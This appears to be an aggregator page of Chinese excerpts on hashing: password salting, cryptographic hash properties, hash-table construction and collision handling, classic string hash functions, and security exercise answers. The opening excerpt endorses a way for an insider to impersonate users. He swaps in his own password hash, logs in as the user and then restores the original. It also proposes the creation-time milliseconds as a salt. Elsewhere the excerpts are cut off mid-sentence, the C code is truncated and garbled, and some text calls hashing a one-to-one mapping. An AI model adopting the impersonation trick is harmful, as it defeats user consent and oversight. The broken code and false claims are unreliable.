证的时候,用相同的HASH函数计算用户输入的密码得到计算HASH值然后比对数据库中存储的HASH值是否一致,从而完成验证。由于用户的密码的一样的可能性是很高的,防止DBA猜测用户密码,我们还会用一种俗称“撒盐”的过程,就是计算密码的HASH值之前,把密码和另外一个会比较发散的数据拼接,通常我们会用用户创建时间的毫秒部分。这样计算的HASH值不大会都是一样的,会很发散。最后,作为一个老程序员,我会把用户的HASH值保存好,然后把我自己密码的HASH值保存到数据库里面,然后用我自己的密码和其他用户的用户名去登录,然后再改回来解决我看不到用户密码而又要“偷窥”用户的需要。最大的好处是,数据库泄露后,得到用户数据库的黑客看着一大堆HASH值会翻白眼。 哈希算法又称为摘要算法,它可以将任意数据通过一个函数转换成长度固定的数据串(通常用16进制的字符串表示),函数与数据串之间形成一一映射的关系。 举个粒子,我写了一篇小说,摘要是一个string:'关于甲状腺精灵的奇妙冒险',并附上这篇文章的摘要是'2d73d4f15c0db7f5ecb321b6a65e5d6d'。如果有人篡改了我的文章,并发表为'关于JOJO的奇妙冒险',我可以立即发现我的文章被篡改过,因为根据'关于JOJO的奇妙冒险'计算出的摘要不同于原始文章的摘要。 可见,摘要算法就是通过摘要函数f()对任意长度的数据data计算出固定长度的摘要digest,目的是为了发现原始数据是否被人篡

hash算法

Hash,一般翻译做"散列",也有直接音译为"哈希"的,就是把任意长度的输入(又叫做预映射,pre-image),通过散列算法,变换成固定长度的输出,该输出就是散列值。这种转换是一种压缩映射,也就是,散列值的空间通常远小于输入的空间,不同的输入可能会散列成相同的输出,而不可能从散列值来唯一的确定输入值。 数学表述为:h = H(M) ,其中H( )--单向散列函数,M--任意长度明文,h--固定长度散列值。 在信息安全领域中应用的Hash算法,还需要满足其他关键特性: 第一当然是单向性(one-way),从预映射,能够简单迅速的得到散列值,而在计算上不可能构造一个预映射,使其散列结果等于某个特定的散列值,即构造相应的M=H-1(h)不可行。这样,散列值就能在统计上唯一的表征输入值,因此,密码学上的Hash 又被称为"消息摘要(message digest)",就是要求能方便的将"消息"进行"摘要",但在"摘要"中无法得到比"摘要"本身更多的关于"消息"的信息。 第二是抗冲突性(collision-resistant),即在统计上无法产生2个散列值相同的预映射。给定M,计算上无法找到M',满足H(M)=H(M') ,此谓弱抗冲突性;计算上也难以寻找一对任意的M和M',使满足H(M)=H(M') ,此谓强抗冲突性。要求"强抗冲突性"主要是为了防范所谓"生日攻击(birthday attack)",在一个10人的团体中,你能找到和你生日相同的人的概率是2.4%,而在同一团体中,有2人生日相同的概率是11.7%。类似的,当预映射的空间很大的情况下,算法必须有足够的强度来保证不能轻易找到"相同生日"的人。 第三是映射分布均匀性和差分分布均匀性,散列结果中,为0 的bit 和为 1 的bit ,其总数应该大致相等;输入中一个bit 的变化,散列结果中将有一半以上的bit 改变,这又叫做"雪崩效应(avalanche effect)";要实现使散列结果中出现1bit 的变化,则输入中至少有一半以上的bit 必须发生变化。其实质是必须使输入中每一个bit 的信息,尽量均匀的反映到输出的每一个bit 上去;输出中的每一个bit,都是输入中尽可能多bit 的信息一起作用的结果。 Damgard 和Merkle 定义了所谓"压缩函数(compression function)",就是将一个固定长度输入,变换成较短的固定长度的输出,这对密码学实践上Hash 函数的设计产生了很大的影响。Hash函数就是被设计为基于通过特定压缩函数的不断重复"压缩"输入的分组和前一次压缩处理的结果的过程,直到整个消息都被压缩完毕,最后的输出作为整个消息的散列值。尽管还缺乏严格的证明,但绝大多数业界的研究者都同意,如果压缩函数是安全的,那么以上述形式散列任意长度的消息也将是安全的。这就是所谓Damgard/Merkle 结构: 在下图中,任意长度的消息被分拆成符合压缩函数输入要求的分组,最后一个分组可能需要在末尾添上特定的填充字节,这些分组将被顺序处理,除了第一个消息分组将与散列初始化值一起作为压缩函数的输入外,当前分组将和前一个分组的压缩函数输出一起被作为这一次

哈希的基本概念

6、8 哈希表及其查找★3◎4 哈希译自“hash"一词,也称为散列或杂凑。?哈希表查找得基本思想就是:根据当前待查找数据得特征,以记录关键字为自变量,设计一个哈希函数,依该函数按关键码计算元素得存储位置,并按此存放;查找时,由同一个函数对给定值key计算地址,将key与地址单元中元素关键码进行比较,确定查找就是否成功。哈希方法中使用得转换函数称为哈希函数(杂凑函数),按这个思想构造得表称为哈希表(杂凑表)。?对于n个数据元素得集合,总能找到关键码与存放地址一一对应得函数、若最大关键为m,可以分配m个数据元素存放单元,选取函数f(ke y)=key即可,但这样会造成存储空间得很大浪费,甚至不可能分配这么大得存储空间、通常关键码得集合比哈希地址集合大得多,因而经过哈希函数变换后,可能将不同得关键码映射到同一个哈希地址上,这种现象称为冲突(Collisio n)。映射到同一哈希地址上得关键码称为同义词。可以说,冲突不可能避免,只能尽可能减少。所以,哈希方法需要解决以下两个问题:?(1)构造好得哈希函数?①所选函数尽可能简单,以便提高转换速度。?②所选函数对关键码计算出得地址,应在哈希地址集中大致均匀分布,以减少空间浪费。 (2)制定解决冲突得方案 1.常用得哈希函数 (1)直接定址法 即取关键码得某个线性函数值为哈希地址,这类函数就是一一对应函数,不会产生冲突,但要求地址集合与关键码集合大小相同,因此,对于较大得关键码集合不适用。如关键码集合为{100,300,500,700,800,900},选取哈希函数为Ha

sh(key)=key/100,则存放如表6-3所示。 表6—3 直接定址法构造哈希表 (2)除留余数法 即取关键码除以p得余数作为哈希地址。使用除留余数法,选取合适得p很重要,若哈希表表长为m,则要求p≤m,且接近m或等于m。p一般选取质数,也可以就是不包含小于20质因子得合数、?(3)数字分析法 设关键码集合中,每个关键码均由m位组成,每位上可能有r种不同得符号、?数字分析法根据r种不同得符号及在各位上得分布情况,选取某几位,组合成哈希地址。所选得位应就是各种符号在该位上出现得频率大致相同。 (4)平方取中法?对关键码平方后,按哈希表大小,取中间得若干位作为哈希地址。?(5)折叠法(Folding)?此方法将关键码自左到右分成位数相等得几部分,最后一部分位数可以短些,然后将这几部分叠加求与,并按哈希表表长,取后几位作为哈希地址。这种方法称为折叠法。?有两种叠加方法:?①移位法-—将各部分得最后一位对齐相加。 ②间界叠加法—-从一端向另一端沿各部分分界来回折叠后,最后一位对齐相加。?如对关键码为key=25346358705,设哈希表长为3位数,则可对关键码每3位一部分来分割。关键码分割为如下4组: 253 463 58705 分别用上述方法计算哈希地址如图6—12所示、对于位数很多得关键码,且每一位上符号分布较均匀时,可采用此方法求得哈希地址。

哈希算法介绍

哈希算法简介

目录 1哈希算法概念 (2) 2哈希函数 (3) 3冲突的解决方法 (3) 4哈希算法应用 (4)

关键词: 算法、哈希、c语言 摘要: 哈希算法在软件开发和Linux内核中多次被使用,由此可以见哈希算法的实用性和重要性。本文介绍了哈希算法的原理和应用,并给出了简略的代码实现,以便读者理解。

1哈希算法概念 哈希(hash 散列,音译为哈希) 算法将任意长度的二进制值映射为固定长度的较小二进制值,这个小的二进制值称为哈希值。 哈希值是一段数据唯一且极其紧凑的数值表示形式。如果散列一段明文而且哪怕只更改该段落的一个字母,随后的哈希算法都将产生不同的值。要找到散列为同一个值的两个不同的输入,在计算上是不可能的,所以数据的哈希值可以检验数据的完整性。 哈希表是根据设定的哈希函数H(key)和处理冲突方法将一组关键字映象到一个有限的地址区间上,并以关键字在地址区间中的项作为记录在表中的存储位置,这种表称为哈希表,所得存储位置称为哈希地址。作为线性数据结构与表格和队列等相比,哈希表无疑是查找速度比较快的一种。 查找一般是对项的摸个部分(及数据成员)进行,这部分称为键(key )。例如,项可以由字符串作为键,附带一些数据成员。 理想的哈希表数据结构只不过是一个包含一些项的具有固定大小的数组。 通常的习惯是让项从0到 TableSize-1之间变化。 将每个键映射到0到TableSize-1 这个范围中的某个数 ,并且将其放到适当的单元中,这个映射就称为散列函数(hash funciton )。 如右图,john 被散列到3,phil 被散列到4,dave 被散列到6,mary 被散列到7. 这是哈希的基本思想。剩下的问题则是要选择一个函数,决定当两个键散列到同一个值的时候(称为冲突),应该做什么。

计算机信息安全技术课后习题答案

第一章计算机信息安全技术概述 1、计算机信息系统安全的威胁因素主要有哪些? (1)人为无意失误 (2)人为恶意攻击 (3)计算机软件的漏洞和后门 2、从技术角度分析引起计算机信息系统安全问题的根本原因。 (1)计算机外部安全 (2)信息在计算机系统存储介质上的安全 (3)信息在传输过程中的安全 3、信息安全的CIA指的是什么? Confidenciality 隐私性,也可称为机密性,是指只有授权的用户才能获取信息Integrity 完整性,是指信息在传输过程中,不被非法授权和破坏,保证数据的一致性 Availability 可用性,是指信息的可靠度 4、简述PPDR安全模型的构成要素及运作方式 PPDR由安全策略,防护,检测和响应构成 运作方式:PPDR模型在整体的安全策略的控制和指导下,综合运用防护工具的同时,利用检测工具了解和评估系统的安

全状态,通过适当的安全响应将系统调整在一个相对安全的状态。防护,检测和响应构成一个完整的、动态的安全循环。 5、计算机信息安全研究的主要内容有哪些? (1)计算机外部安全 (2)信息在计算机系统存储介质上的安全 (3)信息在传输过程中的安全 6、计算机信息安全的定义是什么? 计算机信息安全是研究在特定的应用环境下,依据特定的安全策略,对信息及信息系统实施防护,检测和恢复的科学 7、信息安全系统中,人、制度和技术之间的关系如何? 在信息安全系统中,人是核心。任何安全系统的核心都是人。而技术是信息安全系统发展的动力,技术的发展推动着信息安全系统的不断完善。信息安全系统不仅要靠人和技术,还应该建立相应的制度以起到规范的作用。只有三者的完美结合,才有安全的信息安全系统

几种字符串哈希HASH算法的性能比较

几种字符串哈希HASH算法的性能比较 2011年01月26日星期三 19:40 这不就是要找hash table的hash function吗? 1 概述 链表查找的时间效率为O(N),二分法为log2N,B+ Tree为log2N,但Hash链表查找的时间效率为O(1)。 设计高效算法往往需要使用Hash链表,常数级的查找速度是任何别的算法无法比拟的,Hash 链表的构造和冲突的不同实现方法对效率当然有一定的影响,然而Hash函数是Hash链表最核心的部分,本文尝试分析一些经典软件中使用到的字符串 Hash函数在执行效率、离散性、空间利用率等方面的性能问题。 2 经典字符串Hash函数介绍 作者阅读过大量经典软件原代码,下面分别介绍几个经典软件中出现的字符串Hash函数。 2.1 PHP中出现的字符串Hash函数 static unsigned long hashpjw(char *arKey, unsigned int nKeyLength) { unsigned long h = 0, g; char *arEnd=arKey+nKeyLength; while (arKey < arEnd) { h = (h << 4) + *arKey++; if ((g = (h & 0xF0000000))) { h = h ^ (g >> 24); h = h ^ g; } } return h; } 2.2 OpenSSL中出现的字符串Hash函数 unsigned long lh_strhash(char *str) { int i,l; unsigned long ret=0; unsigned short *s; if (str == NULL) return(0); l=(strlen(str)+1)/2; s=(unsigned short *)str; for (i=0; i ret^=(s[i]<<(i&0x0f)); return(ret);

散列表(哈希表)

1. 引言 哈希表(Hash Table)的应用近两年才在NOI(全国青少年信息学奥林匹克竞赛)中出现,作为一种高效的数据结构,它正在竞赛中发挥着越来越重要的作用。 哈希表最大的优点,就是把数据的存储和查找消耗的时间大大降低,几乎可以看成是常数时间;而代价仅仅是消耗比较多的内存。然而在当前可利用内存越来越多的情况下,用空间换时间的做法是值得的。另外,编码比较容易也是它的特点之一。 哈希表又叫做散列表,分为“开散列” 和“闭散列”。考虑到竞赛时多数人通常避免使用动态存储结构,本文中的“哈希表”仅指“闭散列”,关于其他方面读者可参阅其他书籍。 2. 基础操作 2.1 基本原理 我们使用一个下标范围比较大的数组来存储元素。可以设计一个函数(哈希函数,也叫做散列函数),使得每个元素的关键字都与一个函数值(即数组下标)相对应,于是用这个数组单元来存储这个元素;也可以简单的理解为,按照关键字为每一个元素“分类”,然后将这个元素存储在相应“类”所对应的地方。 但是,不能够保证每个元素的关键字与函数值是一一对应的,因此极有可能出现对于不同的元素,却计算出了相同的函数值,这样就产生了“冲突”,换句话说,就是把不同的元素分在了相同的“类”之中。后面我们将看到一种解决“冲突”的简便做法。 总的来说,“直接定址”与“解决冲突”是哈希表的两大特点。 2.2 函数构造 构造函数的常用方法(下面为了叙述简洁,设h(k) 表示关键字为k 的元素所对应的函数值): a) 除余法: 选择一个适当的正整数p ,令h(k ) = k mod p ,这里,p 如果选取的是比较大

的素数,效果比较好。而且此法非常容易实现,因此是最常用的方法。 b) 数字选择法: 如果关键字的位数比较多,超过长整型范围而无法直接运算,可以选择其中数字分布比较均匀的若干位,所组成的新的值作为关键字或者直接作为函数值。 2.3 冲突处理 线性重新散列技术易于实现且可以较好的达到目的。令数组元素个数为S ,则当h(k)已经存储了元素的时候,依次探查(h(k)+i) mod S , i=1,2,3…… ,直到找到空的存储单元为止(或者从头到尾扫描一圈仍未发现空单元,这就是哈希表已经满了,发生了错误。当然这是可以通过扩大数组范围避免的)。 2.4 支持运算 哈希表支持的运算主要有:初始化(makenull)、哈希函数值的运算(h(x))、插入元素(i nsert)、查找元素(member)。设插入的元素的关键字为x ,A 为存储的数组。初始化比较容易,例如: const empty=maxlongint; // 用非常大的整数代表这个位置没有存储元素 p=9997; // 表的大小 procedure makenull; var i:integer; begin for i:=0 to p-1 do A[i]:=empty; End; 哈希函数值的运算根据函数的不同而变化,例如除余法的一个例子:

HASH表

hashing定义了一种将字符组成的字符串转换为固定长度(一般是更短长度)的数值或索引值 的方法,称为散列法,也叫哈希法。由于通过更短的哈希值比用原始值进行数据库搜索更快,这种方法一般用来在数据库中建立索引并进行搜索,同时还用在各种解密算法中。 设所有可能出现的关键字集合记为u(简称全集)。实际发生(即实际存储)的关键字集合记为k(|k|比|u|小得多)。|k|是集合k中元素的个数。 散列方法是使用函数hash将u映射到表t[0..m-1]的下标上(m=o(|u|))。这样以u中关键字为自变量,以h为函数的运算结果就是相应结点的存储地址。从而达到在o(1)时间内就可完成查找。 其中: ①hash:u→{0,1,2,…,m-1} ,通常称h为散列函数(hash function)。散列函数h 的作用是压缩待处理的下标范围,使待处理的|u|个值减少到m个值,从而降低空间开销。 ②t为散列表(hash table)。 ③hash(ki)(ki∈u)是关键字为ki结点存储地址(亦称散列值或散列地址)。 ④将结点按其关键字的散列地址存储到散列表中的过程称为散列(hashing). 比如:有一组数据包括用户名字、电话、住址等,为了快速的检索,我们可以利用名字作为关键码,hash规则就是把名字中每一个字的拼音的第一个字母拿出来,把该字母在26个字母中的顺序值取出来加在一块作为改记录的地址。比如张三,就是z+s=26+19=45。就是把张三存在地址为45处。 但是这样存在一个问题,比如假如有个用户名字叫做:周四,那么计算它的地址时也是z+s=45,这样它与张三就有相同的地址,这就是冲突,也叫作碰撞! 冲突:两个不同的关键字,由于散列函数值相同,因而被映射到同一表位置上。该现象称为冲突(collision)或碰撞。发生冲突的两个关键字称为该散列函数的同义词(synonym)。 冲突基本上不可避免的,除非数据很少,我们只能采取措施尽量避免冲突,或者寻找解决冲突的办法。影响冲突的因素 冲突的频繁程度除了与h相关外,还与表的填满程度相关。 设m和n分别表示表长和表中填人的结点数,则将α=n/m定义为散列表的装填因子(load factor)。α越大,表越满,冲突的机会也越大。通常取α≤1。 散列函数的构造方法: 1、散列函数的选择有两条标准:简单和均匀。 简单指散列函数的计算简单快速; 均匀指对于关键字集合中的任一关键字,散列函数能以等概率将其映射到表空间的任何一个位置上。也就是说,散列函数能将子集k随机均匀地分布在表的地址集{0,1,…,m-1}上,以使冲突最小化。 2、常用散列函数 (1)直接定址法:比如在一个0~100岁的年龄统计表,我们就可以把年龄作为地址。 (2)平方取中法

设计构造哈希表的完整算法,求出平均查找长度

《程序设计与算法分析》实验报告 一设计的目的与内容 1.设计目的 通过本实验需要掌握构造哈希函数表,需要完成设计构造哈希表的完整算法,并求出平均查找长度。 2 实验内容 使用哈希函数:H(K)=3*K MOD 11 并采用开放地址法解决冲突,试在0到10的散列地址空间对关键字序列( 22, 41, 53, 46, 30,13, 01,67)构造哈希函数表,并设计构造哈希表的完整算法,并求出平均查找长度。 二算法的基本思想 1.数据结构的设计 哈希函数H ( key ) =3* key mod 11,哈希表的地址空间为0 ~10,对关键字序列(22, 41, 53, 46, 30,13, 01,67)按线性探测再散列和二次探测再散列的方法分别构造哈希表。 ( 1 )线性探测再散列: 3*22%11 = 0;3*41 %11=2 ;3*53%11 = 5 ;3* 46%11=6;3*30%11=2发生冲突,下一个存储地址(2+ 1 )%11 = 3 ; 3*13%11=6发生冲突,下一个存储地址(6+1 )%11 =7 ; 3*01%11=3发生冲突,下一个存储地址(3+1 )%11 =4 ; 3*67%11=3发生冲突,下一个存储地址是:(3 +1 )%11 =4 发生冲突;下一个存储地址( 4 + 1 )%11=5发生冲突;下一个存储地址( 5 + 1 )%11=6发生冲突;下一个存储地址(6+ 1 )%11=7发生冲突;下一个存储地址(7 + 1 )%11=8未发生冲突。

2.算法的基本思想 开放地址法这个方法的基本思想是:当发生地址冲突时,按照某种方法继续探测哈希表中的其他存储单元,直到找到空位置为止。这个过程可用下式描述: H i ( key ) = ( H ( key )+ d i ) mod m ( i = 1,2,…… ,k ( k ≤ m – 1)) 其中:H ( key ) 为关键字key 的直接哈希地址,m 为哈希表的长度,di 为每次再探测时的地址增量。采用这种方法时,首先计算出元素的直接哈希地址H ( key ) ,如果该存储单元已被其他元素占用,则继续查看地址为H ( key ) + d 2 的存储单元,如此重复直至找到某个存储单元为空时,将关键字为key 的数据元素存放到该单元。增量 d 可以有不同的取法,并根据其取法有不同的称呼: ( 1 ) d i = 1 , 2 , 3 ,…… 线性探测再散列; ( 2 )d i =1^2 ,-1^2 ,2^2 ,-2^2 ,k^2,-k^2…… 二次探测再散列; ( 3 ) d i =伪随机序列伪随机再散列; 三源程序代码及测试结果 1.源程序代码 #include #include #define M 11 #define N 8 struct hterm { int key; //关键字值 int si; //散列次数 };

字符串哈希算法

经典字符串Hash函数 工作中经常需要用大hash这个强有力的工具,hash表最核心的部分则在于怎么设计一个好的hash函数,以使数据更均匀地分布在若干个桶上。下面来介绍一下我现在用到的一个hash函数,我们来看代码: unsigned chostcachehash::get_host_key(const string& host) { int result = 1; unsigned i = 0; for (i = 0; i > 24); h = h ^ g; } } return h; } openssl中出现的字符串hash函数 unsigned long lh_strhash(char *str) { int i,l; unsigned long ret=0; unsigned short *s;

相关文档
最新文档